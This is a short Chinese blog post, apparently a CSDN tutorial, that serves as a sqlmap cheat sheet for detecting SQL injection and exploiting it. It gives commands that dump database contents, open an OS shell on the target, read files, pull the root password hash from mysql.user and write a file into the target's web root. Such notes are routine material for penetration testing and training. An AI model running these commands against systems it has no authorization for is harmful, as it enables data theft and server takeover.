sqlmap使用

sqlmap介绍

sqlmap是一款自动化得sql注入工具,主要功能扫描判断是否存在sql注入漏洞,发现并利用给定得url得sql注入漏洞

get注入

sqlmap.py -u “url” 检测
sqlmap.py -u “url” --dbs 爆出数据库名
sqlmap.py -u “url” --tables -D “数据库名” 爆表
sqlmap.py -u “url” --columns -T “表名” -D “数据库名” 爆字段
sqlmap.py -u “url” --dump -T “表名” -D “数据库名” -C “字段名” 爆出里面的内容

检测级别

–level 测试等级(1-5),默认为1

属性头注入

–referer sqlmap可以在请求中伪造HTTP中的referer,当–level参数设定为3或3以上的时候会尝试对referer注入
–headers

sqlmap*优先指定检测注入

执行命令

sqlmap.py -u “url” --os-shell#系统交互shell
sqlmap.py -u “url” --os-cmd=ipconfig

自定义请求包注入

-r 参数

注入的选择

参数:–technique
这个参数可以指定sqlmap使用的探测技术,默认情况下会测试所有的方式。

支持的探测方式如下:

B: Boolean-based blind SQL injection(布尔型注入)
E: Error-based SQL injection(报错型注入)
U: UNION query SQL injection(可联合查询注入)
S: Stacked queries SQL injection(可语句查询注入)
T: Time-based blind SQL injection(基于多时间延迟注入)

其他

–proxy “http://127.0.0.1:8080″ #代理
–threads    #采用多线程(–threads 3)
–sql-query #执行指定的sql语句(–sql-query “SELECT password FROM mysql.user WHERE user = ‘root’ LIMIT 0, 1″ )
–file-read #读取指定文件
–file-write #写入本地文件(–file-write /test/test.txt –file-dest /var/www/html/1.txt;将本地的test.txt文件写入到目标的1.txt)
–dbms #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB)

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

練家子

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值